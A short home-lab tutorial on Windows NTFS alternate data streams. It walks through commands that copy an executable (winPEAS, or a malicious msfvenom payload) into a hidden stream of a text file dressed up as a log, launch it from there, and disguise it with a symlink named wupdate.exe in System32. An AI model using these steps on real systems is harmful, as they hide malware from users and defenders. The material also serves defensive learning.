🔬 Home Lab
I will use a Windows 10 Virtual Machine for this demonstration
- Open a Command Prompt (
cmd)
notepad text.txt- Check the Resource Stream (metadata) of the file
notepad test.txt:secret.txt
# secret.txt contains the Resource Stream
notepad test.txt
# normal Data Stream
e.g. - Download latest winPEASx64_ofs.exe (Antivirus may block the file), rename it to payload.exe and move it to C:\Temp directory
- Using the
typecommand, redirect the output into a new legitimate text file, passing in the actual executable into the text file resource stream.
type payload.exe > windows_log.txt:winpeas.exe
del payload.exewindows_log.txtfile can be filled with legitimate logs data to make it as realistic as possible- Start the hidden executable
start windows_log.txt:winpeas.exe
- Open an elevated
cmdand create a symbolic link
cd C:\Windows\System32
mklink wupdate.exe C:\Temp\windows_log.txt:winpeas.exe
- Run
wupdate.exeto launch thewinpeas.exepayload from the Resource stream of the windows_log.txt file
wupdate📌 Same as above procedure can be done with a malicious
msfvenompayload.